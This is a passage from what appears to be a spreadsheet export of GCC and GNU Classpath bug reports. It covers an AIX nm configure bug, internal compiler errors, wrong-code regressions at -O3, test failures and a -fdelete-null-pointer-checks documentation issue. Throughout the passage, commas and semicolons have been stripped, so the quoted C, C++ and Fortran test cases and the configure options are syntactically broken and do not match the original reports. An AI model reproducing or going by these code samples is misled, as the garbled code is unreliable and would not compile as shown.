    #!/bin/sh
    exec  $@
2) while configuring powerpc-ibm-aix5.3.0.0/libstdc++-v3:
checking dynamic linker characteristics... aix5.3.0.0 ld.so
checking command to parse /build/./gcc/nm -B -X32_64 output... /build/./gcc/nm: line 2: exec: -B: invalid option
exec: usage: exec [-cl] [-a name] file [redirection ...]
/build/./gcc/nm: line 2: exec: -B: invalid option
exec: usage: exec [-cl] [-a name] file [redirection ...]
failed
checking if libtool supports shared libraries... yes
3) The generated libstdc++.a does not export any symbols because nm fails to create a list of symbols due to 2).
4) When using g++ the simplest resulting linker error is
    ld: 0711-317 ERROR: Undefined symbol: __gxx_personality_v0
'-bnoquiet' linker-output contains this line:
    LIBRARY: Shared object libstdc++.a[libstdc++.so.6]: 0 symbols imported.
Looks like the same problem was here:
http://gcc.gnu.org/ml/gcc-help/2007-09/msg00100.html
The code around line 13513 in gcc-4.2.0/gcc/configure is:
13507 if test -f $gcc_cv_binutils_srcdir/configure.in \
13508      &amp;&amp; test -f ../binutils/Makefile \
13509       then
13510     gcc_cv_nm=../binutils/nm-new$build_exeext
13511 elif test -x nm$build_exeext then
13512     gcc_cv_nm=./nm$build_exeext
13513 elif test -x $NM_FOR_TARGET then
           ^^^^^^^ broken ^^^^^^^
13514         gcc_cv_nm=$NM_FOR_TARGET
13515 else
13516         # Extract the first word of $NM_FOR_TARGET so it can be a program name with args.
13517 set dummy $NM_FOR_TARGET ac_word=$2
13518 echo $as_me:$LINENO: checking for $ac_word &gt;&amp;5
This problem came up with gentoo-alt/prefix - still using native toolchain. but wrapped with binutils-config - thus /prefix/${target}/bin/nm is available (actually gentoo-alt/prefix configures with --prefix=/prefix/usr and builds within some longer builddir - have it shortened here for readability).
Have already searched in gcc-svn:
This problem was introduced in revision 110266 of trunk/gcc/configure.ac being both in gcc-4.2-branch and trunk but not gcc-4.1-branch.
What I'm unable to say is how to fix this correctly.</t>
  </si>
  <si>
    <t>GCC-77483</t>
  </si>
  <si>
    <t>[6/7 regression] gcc.target/i386/mask-unpack.c etc. FAIL</t>
  </si>
  <si>
    <t>Between 20160830 (r239861) and 20160901 (r239916) a couple of testcases started
to FAIL on 32-bit Solaris/x86 both on mainline and the gcc-6 branch:
FAIL: gcc.target/i386/mask-unpack.c scan-assembler-not maskmov
FAIL: gcc.target/i386/pr65105-1.c scan-assembler pand
FAIL: gcc.target/i386/pr65105-1.c scan-assembler por
FAIL: gcc.target/i386/pr65105-2.c scan-assembler por
FAIL: gcc.target/i386/pr65105-3.c scan-assembler pand
FAIL: gcc.target/i386/pr65105-3.c scan-assembler por
FAIL: gcc.target/i386/pr65105-3.c scan-assembler ptest
FAIL: gcc.target/i386/pr65105-5.c scan-assembler pandn
FAIL: gcc.target/i386/pr65105-5.c scan-assembler ptest
FAIL: gcc.target/i386/pr65105-5.c scan-assembler pxor
FAIL: gcc.target/i386/pr67761.c scan-assembler paddq
FAIL: gcc.target/i386/pr70799-1.c scan-assembler movdqa[ \\\\t]+.?LC0
FAIL: gcc.target/i386/pr70799-1.c scan-assembler pcmpeqd
FAIL: gcc.target/i386/pr70799-1.c scan-assembler pxor
  Rainer</t>
  </si>
  <si>
    <t>GCC-43362</t>
  </si>
  <si>
    <t>ICE with structure constuctor with DT component</t>
  </si>
  <si>
    <t>The following program gives an ICE with gfortran 4.1 4.2 4.3 4.4 and 4.5. The program is valid (except for the one marked line) and compiles with NAG f95 ifort and g95. With the marked line it is invalid which is not diagnosed but also gives an ICE.
implicit none
type t
  integer pointer :: a
end type t
type t2
  type(t) :: b
end type t2
contains
 pure subroutine foo(x)
   type(t)intent(in) :: x
   type(t) :: z
   type(t2) :: y
   y = t2(x) ! ICE valid LHS type (note: F2003 C1272 (3) does not apply)
   z = t2(x) ! ICE invalid LHS type
 end subroutine foo
end module m</t>
  </si>
  <si>
    <t>GCC-27704</t>
  </si>
  <si>
    <t>Incorrect runtime error on multiple OPEN</t>
  </si>
  <si>
    <t>The following should not produce a runtime error.
       OPEN(8 FORM = 'unformatted' STATUS = 'scratch')
       OPEN(8 FORM = 'unformatted' STATUS = 'scratch')
       end
There may be other combinations of arguments to open that should not error
See the following thread:
http://gcc.gnu.org/ml/fortran/2006-05/msg00307.html</t>
  </si>
  <si>
    <t>GCC-70522</t>
  </si>
  <si>
    <t>Hidden friend functions block qualified name lookup into nested unnamed namespace</t>
  </si>
  <si>
    <t>This program should compile without error:
namespace N {
    struct S {
        friend void f(S&amp;) {}
    }
    namespace {
        int f
    }
}
int main() {
    N::f = 42
}
yet GCC 6 diagnoses:
prog.cc: In function 'int main()':
prog.cc:11:5: error: 'f' is not a member of 'N'
     N::f = 42
     ^
prog.cc:11:5: note: suggested alternative:
prog.cc:6:13: note:   'N::{anonymous}::f'
         int f
             ^
The program compiles correctly if either the friend declaration of f is commented out or the unnamed namespace is made an inline namespace.
Language lawyer justification:
The friend declaration of f is not visible to name lookup of N::f per [namespace.memdef]/3 so the set of declarations S'(Nf) described in [namespace.qual]/2 is empty. Name lookup should continue into namespaces nominated by using directives in N unnamed namespaces are such namespaces per [namespace.unnamed]/1.</t>
  </si>
  <si>
    <t>GCC-33239</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] internal compiler error in instantiate_class_template at cp/pt.c:5666</t>
  </si>
  <si>
    <t>All is in the title. Here is the complete output I have (my system is in french):
g++ -DHAVE_CONFIG_H -I. -I.. -I ../src    -g -O2 -MT sample1.o -MD -MP -MF .deps/sample1.Tpo -c -o sample1.o sample1.cpp
../src/tuple.hpp: In instantiation of 'yactl::tuple_impl std::allocator &gt; &gt;::append std::allocator &gt; &gt;':
../src/tuple.hpp:105:   instantiated from 'yactl::tuple std::allocator &gt; yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type yactl::null_type&gt;'
sample1.cpp:37:   instantiated from here
../src/tuple.hpp:40: erreur interne du compilateur: dans instantiate_class_template Ã  cp/pt.c:5666
Veuillez soumettre un rapport complet d'anomalies
avec le source prÃ©-traitÃ© si nÃ©cessaire.
Consultez  pour plus de dÃ©tail.</t>
  </si>
  <si>
    <t>masse_nicolas</t>
  </si>
  <si>
    <t>GCC-3378</t>
  </si>
  <si>
    <t>make rebuilds</t>
  </si>
  <si>
    <t>Make process does rebuilds after a complete build is done.
Release:
gcc-3.0
Environment:
Solaris 8
How-To-Repeat:
make - first build
make - will see many files get compiled again</t>
  </si>
  <si>
    <t>dhighley</t>
  </si>
  <si>
    <t>GCC-51113</t>
  </si>
  <si>
    <t>[4.7 regression] rev. 181105 causes Firefox profiledbuild failure</t>
  </si>
  <si>
    <t>Firefox fails to build during the -fprofile-generate phase 
of a profiledbuild:
c++ -o js  -fno-rtti -pedantic -Wall -Wpointer-arith -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wcast-align -W
no-invalid-offsetof -Wno-variadic-macros -Werror=return-type -Wno-long-long -march=native -fvisibility-inlines-hidden -Wno-delete-non-virtual-dtor -p
thread -pipe  -DNDEBUG -DTRIMMED -fprofile-generate -O3 -fomit-frame-pointer js.i_o jsworkers.i_o jsoptparse.i_o jsheaptools.i_o   -lpthread -Wl-O1
--hash-style=gnu--as-needed--no-keep-memory--gc-sections  -fprofile-generate -Wl-rpath-link../../../dist/bin -Wl-rpath-link/var/tmp/mozilla-ce
ntral/moz-build-dir/dist/lib   -Wl--whole-archive ../../../dist/lib/libmozutils.a -Wl--no-whole-archive -rdynamic -L../../../dist/bin -L../../../di
st/lib -Wl-R/usr/lib64 -L/usr/lib64 -lplds4 -lplc4 -lnspr4 -lpthread -ldl ../editline/libeditline.a ../libjs_static.a -ldl    
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::StringOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZN2js3cli6detail12StringOptionD1Ev' is not defi
ned locally
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::StringOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZN2js3cli6detail12StringOptionD0Ev' is not defi
ned locally
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::StringOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZNK2js3cli6detail12ValuedOption8isValuedEv' is 
not defined locally
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::IntOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZN2js3cli6detail9IntOptionD1Ev' is not defined 
locally
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::IntOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZN2js3cli6detail9IntOptionD0Ev' is not defined 
locally
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::IntOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZNK2js3cli6detail12ValuedOption8isValuedEv' is 
not defined locally
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::MultiStringOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZN2js3cli6detail17MultiStringOptionD1Ev' is not
 defined locally
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::MultiStringOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZN2js3cli6detail17MultiStringOptionD0Ev' is not
 defined locally
jsoptparse.i_o:jsoptparse.cpp:function vtable for js::cli::detail::MultiStringOption: warning: relocation refers to discarded section
/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.0/../../../../x86_64-pc-linux-gnu/bin/ld: error: hidden symbol '_ZNK2js3cli6detail12ValuedOption8isValuedEv' is 
not defined locally
...
I've git bisected this to the following commit:
5014df5d02d9d90bb0a749a035f86bbfbe94bfa4 is the first bad commit
commit 5014df5d02d9d90bb0a749a035f86bbfbe94bfa4
Author: nathan 
Date:   Mon Nov 7 18:14:46 2011 +0000
        libgcc/
        * libgcov.c (struct gcov_fn_buffer): New struct.
        (buffer_fn_data): New helper.
        (gcov_exit): Rework for new gcov data structures.
        gcc/
        * gcov.c (object_summary): Replace with ...
        (object_runs): ... this.
        (process_file): Remove functions with no data.
        (generate_results): Ignore files with no lines.
        (release_function): New helper broken out of ...
        (release_structures): ... here.  Use it.
        (read_count_file): Adjust for new data file format.
        (output_lines): Use object_runs.
        * gcov-io.h (GCOV_TAG_OBJECT_SUMMARY): Obsolete.
        (struct gcov_ctr_info): Move definition.
        (struct gcov_fn_info): Add key field use gcov_ctr_info for
        trailing array.
        (struct gcov_info): Add merge function array remove mask and
        counts.  Trailing array is array of pointers to function info.
        * coverage.c (struct function_list): Replace counter numbers with
        counter arrays.  Add fndecl field.  GTYify.
        (counts_entry): Remove chain workspace.
        (functions_head): GTYify.
        (prg_n_ctrs): Remove.
        (fn_v_ctrs): New.
        (tree_ctr_tables): Remove.
        (read_counts_file): Cope with blank entries and expect program
        summaries before functions.  Don't warn on missing entries.
        (coverage_counter_alloc): Allocate individual function arrays.
        (tree_coverage_counter_ref tree_coverage_counter_addr): Adjust
        for individual function arrays.
        (coverage_end_function): GTYify function list object. Finalize
        function's counter arrays.
        (build_var): New.  Create a counter-related variable with
        appropriate linkage.
        (build_fn_info_type): Adjust for new runtime structure.
        (build_fn_info_value): Rename to ...
        (build_fn_info): ... here.  Build new format data.
        (build_ctr_info_type build_ctr_info_value): Remove.
        (build_info_type): New. Build new format data structure.
        (build_info): Adjust for new format data.
        (create_coverage): Likewise.
        * gcov-dump.c (tag_function): Recognize placeholders.
        gcc/testsuite/
        * gcc.dg/profile-dir-1.c: Adjust final scan.
        * gcc.dg/profile-dir-2.c: Adjust final scan.
        * gcc.dg/profile-dir-3.c: Adjust final scan.
        * gcc.misc-tests/gcov.exp: Adjust regexp.
        * gcc.misc-tests/gcov-12.c: New.
        * gcc.misc-tests/gcov-13.c: New.
        * gcc.misc-tests/gcovpart-13b.c: New.
        * gcc.misc-tests/gcov-14.c: New.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@181105 138bc75d-0d04-0410-961f-82ee72b054a4
Reverting the commit fixes the problem.</t>
  </si>
  <si>
    <t>GCC-3989</t>
  </si>
  <si>
    <t>Strange warning for maps (gcc 3.0 regression)</t>
  </si>
  <si>
    <t xml:space="preserve">When the file t.C is compiled by gcc 3.0.1 a bogus warning is emitted
by the compiler: /usr/local/include/g++-v3/bits/stl_tree.h:819:
warning: statement with no effect. The line in question reads:
_M_key_compare = __x._M_key_compare 
This message is not emitted if the file is compiled by gcc 3.0.
Release:
3.0.1 20010810 (prerelease)
Environment:
System: Linux kiste 2.4.6 #6 Wed Jul 11 02:21:23 CEST 2001 i686 unknown
Architecture: i686
SuSE 7.1
glibc 2.2
linux 2.4.6
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --enable-threads=posix --enable-languages=cc++f77objc --disable-nls --enable-clocale=gnu
How-To-Repeat:
source code t.C
#include 
#include 
typedef std::map previous_results_type
previous_results_type read_previous_results()
{
  previous_results_type result
  return result
}
int main()
{
  previous_results_type previous_results
  previous_results = read_previous_results()
}
Compiling t.C
g++ -v -o t t.C -W -Wall -save-temps 
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/specs
Configured with: ../gcc/configure --enable-shared --enable-threads=posix --enable-languages=cc++f77objc --disable-nls --enable-clocale=gnu
Thread model: posix
gcc version 3.0.1 20010810 (prerelease)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=1 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -W -Wall -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ t.C t.ii
GNU CPP version 3.0.1 20010810 (prerelease) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.C -W -Wall -version -o t.s
GNU CPP version 3.0.1 20010810 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.1 20010810 (prerelease) (i686-pc-linux-gnu)
	compiled by GNU C version 3.0.1 20010810 (prerelease).
/usr/local/include/g++-v3/bits/stl_tree.h: In member function 
   `std::_Rb_tree&amp; 
   std::_Rb_tree::operator=(const 
   std::_Rb_tree&amp;) [with _Key = 
   std::string _Value = std::pair _KeyOfValue 
   = std::_Select1st &gt; _Compare = 
   std::less _Alloc = std::allocator&lt;std::pair&lt;const std::string 
   std::string&gt; &gt;]':
/usr/local/include/g++-v3/bits/stl_map.h:134:   instantiated from `std::map&amp; std::map::operator=(const std::map&amp;) [with _Key = std::string _Tp = std::string _Compare = std::less _Alloc = std::allocator &gt;]'
t.C:18:   instantiated from here
/usr/local/include/g++-v3/bits/stl_tree.h:819: warning: statement with no 
   effect
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o t.o t.s
GNU assembler version 2.11.90.0.23 (i686-pc-linux-gnu) using BFD version 2.11.90.0.23
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o t /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../i686-pc-linux-gnu/lib -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../.. t.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/crtend.o /usr/lib/crtn.o
Preprocessed and uuencode preprocessed source file t.ii.bz2
See attachments for t.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-63484</t>
  </si>
  <si>
    <t>misleading/obsolete -fdelete-null-pointer-checks documentation</t>
  </si>
  <si>
    <t>The current -fdelete-null-pointer-checks documentation is:
&gt; Assume that programs cannot safely dereference null pointers and that no code or data element resides there. This enables simple constant folding optimizations at all optimization levels. In addition other optimization passes in GCC use this flag to control global dataflow analyses that eliminate useless checks for null pointers these assume that if a pointer is checked after it has already been dereferenced it cannot be null.
(both in the manual https://gcc.gnu.org/onlinedocs/gcc-4.9.1/gcc/Optimize-Options.html#Optimize-Options and the man page).
However a new check is done as of GCC 4.9 according to:
  http://blog.mycre.ws/articles/bind-and-gcc-49/
and in particular:
  https://gcc.gnu.org/gcc-4.9/porting_to.html
GCC might now optimize away the null pointer check in code like:
  int copy (int* dest int* src size_t nbytes) {
    memmove (dest src nbytes)
    if (src != NULL)
      return *src
    return 0
  }
The pointers passed to memmove (and similar functions in ) must be non-null even when nbytes==0 so GCC can use that information to remove the check after the memmove call. Calling copy(p NULL 0) can therefore deference a null pointer and crash.
So this new check makes the old -fdelete-null-pointer-checks documentation Assume that programs cannot safely dereference null pointers and that no code or data element resides there. obsolete. Indeed even though calling
  memmove (dest NULL 0)
is invalid it doesn't mean that the null src pointer is dereferenced by memmove (this is not needed if nbytes is 0 like here) or that data reside there.
Said otherwise the developer may think I know that no data reside at address 0 and that null pointers are never dereferenced (otherwise the program would crash). and deduce that the -fdelete-null-pointer-checks option is safe on his code. However it isn't necessarily just because of some ISO C rule that makes some function call invalid (and many developers may not be aware of it as this rule is very unintuitive).
So the documentation should be updated. Alternatively the option could be split between one that removes checks because of code that is obviously wrong (e.g. would yield a crash in practice on most platforms or has semantically no meanings) and one that removes checks because of any invalid code.</t>
  </si>
  <si>
    <t>GCC-68287</t>
  </si>
  <si>
    <t>[6 Regression] conditional jump or move depends on uninitialized value in lra-lives.c:1048</t>
  </si>
  <si>
    <t>Using --enable-valgrind-annotations there's a possible issues in lra-lives.c that is seen by valgrind as conditional jump or move depends on uninitialized value. I know that RA contains couple of valgrind annotations that suppress detection of similar errors. Maybe this should be also included?
revision: r230114
./configure --enable-languages=cc++ --prefix=/home/marxin/Programming/bin/gcc2 --disable-multilib --disable-libsanitizer --enable-checking=release --enable-valgrind-annotations --disable-bootstrap : (reconfigured) ../configure --enable-languages=cc++ --prefix=/home/marxin/Programming/bin/gcc2 --disable-multilib --disable-libsanitizer --enable-checking=release --enable-valgrind-annotations --disable-bootstrap : (reconfigured) ../configure --enable-languages=cc++ --prefix=/home/marxin/Programming/bin/gcc2 --disable-multilib --disable-libsanitizer --enable-checking=release --enable-valgrind-annotations --disable-bootstrap
valgrind --leak-check=yes --trace-children=yes --error-exitcode=111 -q  /home/marxin/Programming/gcc2/objdir/gcc/xgcc -B/home/marxin/Programming/gcc2/objdir/gcc/ -fno-diagnostics-show-caret -fdiagnostics-color=never -O0 -w -c -o 20000609-1.o /home/marxin/Programming/gcc2/gcc/testsuite/gcc.c-torture/compile/20000609-1.c -O0
==28462== Conditional jump or move depends on uninitialised value(s)
==28462==    at 0xB75890: remove_some_program_points_and_update_live_ranges() (lra-lives.c:1048)
==28462==    by 0xB75C96: compress_live_ranges() (lra-lives.c:1161)
==28462==    by 0xB763A0: lra_create_live_ranges_1(bool bool) (lra-lives.c:1310)
==28462==    by 0xB763D7: lra_create_live_ranges(bool bool) (lra-lives.c:1322)
==28462==    by 0xB55420: lra(_IO_FILE*) (lra.c:2301)
==28462==    by 0xB041B3: do_reload() (ira.c:5380)
==28462==    by 0xB04528: (anonymous namespace)::pass_reload::execute(function*) (ira.c:5551)
==28462==    by 0xC163D4: execute_one_pass(opt_pass*) (passes.c:2323)
==28462==    by 0xC166D7: execute_pass_list_1(opt_pass*) (passes.c:2396)
==28462==    by 0xC16708: execute_pass_list_1(opt_pass*) (passes.c:2397)
==28462==    by 0xC16760: execute_pass_list(function* opt_pass*) (passes.c:2407)
==28462==    by 0x8E7E7D: cgraph_node::expand() (cgraphunit.c:1965)
==28462== 
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-65837</t>
  </si>
  <si>
    <t>[arm-linux-gnueabihf] lto1 target specific builtin not available</t>
  </si>
  <si>
    <t>Hi
I got the following error while building chromium on arm-linux-gnueabihf with LTO enabled
when linking libshared_memory_support.so:
lto1: fatal error: target specific builtin not available
Full command line used for linking: http://pastebin.com/2ANsEyMn
This appears to be same as PR45790 (https://gcc.gnu.org/bugzilla/show_bug.cgi?id=45790) which was opened for rs6000 for gcc-4.6.
Since it is fixed for rs6000 I am not sure if I should have re-opened it.
gcc -v:
Using built-in specs.
COLLECT_GCC=/home/prathamesh.kulkarni/gcc-linaro-6.0/bin/arm-linux-gnueabihf-gcc
COLLECT_LTO_WRAPPER=/home/prathamesh.kulkarni/gcc-linaro-6.0/bin/../libexec/gcc/arm-linux-gnueabihf/6.0.0/lto-wrapper
Target: arm-linux-gnueabihf
Configured with: '/home/prathamesh.kulkarni/gnu-toolchain/src/gcc.git~gcc-chromium/configure' SHELL=/bin/bash --with-bugurl=https://bugs.linaro.org --with-mpc=/home/prathamesh.kulkarni/gnu-toolchain/gcc-chromium-arm-linux-gnueabihf/builds/destdir/x86_64-unknown-linux-gnu --with-mpfr=/home/prathamesh.kulkarni/gnu-toolchain/gcc-chromium-arm-linux-gnueabihf/builds/destdir/x86_64-unknown-linux-gnu --with-gmp=/home/prathamesh.kulkarni/gnu-toolchain/gcc-chromium-arm-linux-gnueabihf/builds/destdir/x86_64-unknown-linux-gnu --with-gnu-as --with-gnu-ld --disable-libstdcxx-pch --disable-libmudflap --with-cloog=no --with-ppl=no --with-isl=no --disable-nls --enable-multiarch --disable-multilib --enable-c99 --with-tune=cortex-a9 --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=hard --with-mode=thumb --disable-shared --enable-static --with-build-sysroot=/home/prathamesh.kulkarni/gnu-toolchain/gcc-chromium-arm-linux-gnueabihf/sysroots/arm-linux-gnueabihf --enable-lto --enable-linker-build-id --enable-long-long --enable-shared --with-sysroot=/home/prathamesh.kulkarni/gnu-toolchain/gcc-chromium-arm-linux-gnueabihf/builds/destdir/x86_64-unknown-linux-gnu/libc --enable-languages=cc++lto --enable-fix-cortex-a53-835769 --enable-checking=yes --disable-bootstrap --build=x86_64-unknown-linux-gnu --host=x86_64-unknown-linux-gnu --target=arm-linux-gnueabihf --prefix=/home/prathamesh.kulkarni/gnu-toolchain/gcc-chromium-arm-linux-gnueabihf/builds/destdir/x86_64-unknown-linux-gnu
Thread model: posix
gcc version 6.0.0 20150418 (experimental) (GCC)
Thank you
Prathamesh</t>
  </si>
  <si>
    <t>GCC-2174</t>
  </si>
  <si>
    <t>configure --enable-languages=cc++g77objc does not fail</t>
  </si>
  <si>
    <t>configure --enable-languages=cc++g77objc
(note g77 instead of f77) does not fail.  Instead
it happily ignores the g77 and I end up with a bootstrap
that doesn't test the Fortran compiler that I changed.
This means I waste a good hour and am grouchy.  Oh wait
I'm always grouchy.
Release:
gcc version 3.1 20010304 (experimental)
Environment:
i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-69400</t>
  </si>
  <si>
    <t>[5 Regression] wrong code with -O and int128</t>
  </si>
  <si>
    <t>Created attachment 37412
reduced testcase
This PR shows the problem might be more common than just ccp (PR69399).
Output:
$ x86_64-pc-linux-gnu-gcc -O testcase.c
$ ./a.out 
Aborted
First broken dump is .ccp1:
...
Folding statement: return _3
Folded into: return 0xfffffffffffffffffffffffffffffffe
...
Thus:
$ x86_64-pc-linux-gnu-gcc -O testcase.c -fno-tree-ccp
$ ./a.out 
Aborted
First broken dump is .forwprop1:
...
gimple_simplified to u_2 = 0xfffffffffffffffffffffffffffffffe
gimple_simplified to _3 = 0xfffffffffffffffffffffffffffffffe
...
Thus:
$ x86_64-pc-linux-gnu-gcc -O testcase.c -fno-tree-ccp -fno-tree-forwprop
$ ./a.out 
Aborted
First broken dump is .fre1:
...
Replaced u_1 % 18446744073709551615 with 0xfffffffffffffffffffffffffffffffe in all uses of u_2 = u_1 % 18446744073709551615
...
Thus:
$ x86_64-pc-linux-gnu-gcc -O testcase.c -fno-tree-ccp -fno-tree-forwprop -fno-tree-fre
$ ./a.out 
Aborted
I stopped there.
$ x86_64-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-232548-checking-yes-rtl-df-nographite/bin/../libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --without-cloog --without-ppl --without-isl --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-232548-checking-yes-rtl-df-nographite
Thread model: posix
gcc version 6.0.0 20160119 (experimental) (GCC) 
Tested revisions:
trunk r232548 - FAIL
5-branch r232545 - FAIL
4_[6789]-branch - OK</t>
  </si>
  <si>
    <t>CLASSPATH-23819</t>
  </si>
  <si>
    <t>javax.security.auth.Subject is broken</t>
  </si>
  <si>
    <t>The constructor takes a Collection elements and has a private LinkedList
elements too.
In the body of the constructor there is a fragment:
          if (!elements.contains (o))
            {
              elements.add (o)
            }
inside a loop on elements which should be:
          if (!this.elements.contains (o))
            {
              this.elements.add (o)
            }
or it is not adding the elements in the principals list to the subject's
elements which means a Subject constructed with a list of principals will
always have an empty response to getPrincipals.
In any case I'd recommend renaming the parameter to avoid future confusion.</t>
  </si>
  <si>
    <t>sgala</t>
  </si>
  <si>
    <t>GCC-77855</t>
  </si>
  <si>
    <t>[5 Regression] wrong code at -O3 on x86_64-linux-gnu (in both 32-bit and 64-bit modes)</t>
  </si>
  <si>
    <t>It is a regression from 6.2.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20161004 (experimental) [trunk revision 240755] (GCC) 
$ 
$ gcc-6.2 -O3 small.c ./a.out
2
$ gcc-trunk -O2 small.c ./a.out
2
$ 
$ gcc-trunk -O3 small.c ./a.out
0
$ 
--------------------------------------------------
int a b = 1 c e f g k m n o
char d h i j l 
void fn1 ()
{
  if (e)
    j = 1
  if (f)
  L1:
    k = j | (a 
  for ()
    {
      __builtin_printf (%d\n d)
      if (d)
	break
      for ( o o--)
	for ( n)
	  for ( m m++)
      goto L1
    }
}
void fn2 ()
{
  d = 2
}
void fn3 ()
{
  for ()
    {
      for ( b b--)
	{
	  fn2 (8)  
	  fn1 ()
	}
      g = h
      c = i
      break
    }
}
int main ()
{
  fn3 ()
  return 0 
}</t>
  </si>
  <si>
    <t>GCC-71159</t>
  </si>
  <si>
    <t>[7 regression] ICE in lto_output_edge() lto-cgraph.c:263</t>
  </si>
  <si>
    <t>r236277 FAIL
Error appears after fix ICE for inline_small_functions() : r236270 -- r236274
Sadly error occurred while build big library. I'll try to reduce testcase but it can take some days.
Maybe you'll found useful stacktrace w/o test.
lto1: internal compiler error: Segmentation fault
0xbad38f crash_signal
	/home/dimhen/src/gcc_current/gcc/toplev.c:333
0xa24034 lto_output_edge
	/home/dimhen/src/gcc_current/gcc/lto-cgraph.c:263
0xa24034 output_outgoing_cgraph_edges
	/home/dimhen/src/gcc_current/gcc/lto-cgraph.c:754
0xa25b94 output_symtab()
	/home/dimhen/src/gcc_current/gcc/lto-cgraph.c:1034
0xa3787a lto_output()
	/home/dimhen/src/gcc_current/gcc/lto-streamer-out.c:2386
0xaa282e write_lto
	/home/dimhen/src/gcc_current/gcc/passes.c:2452
0xaa64ea ipa_write_optimization_summaries(lto_symtab_encoder_d*)
	/home/dimhen/src/gcc_current/gcc/passes.c:2656
0x6b898a do_stream_out
	/home/dimhen/src/gcc_current/gcc/lto/lto.c:2294
0x6c5208 stream_out
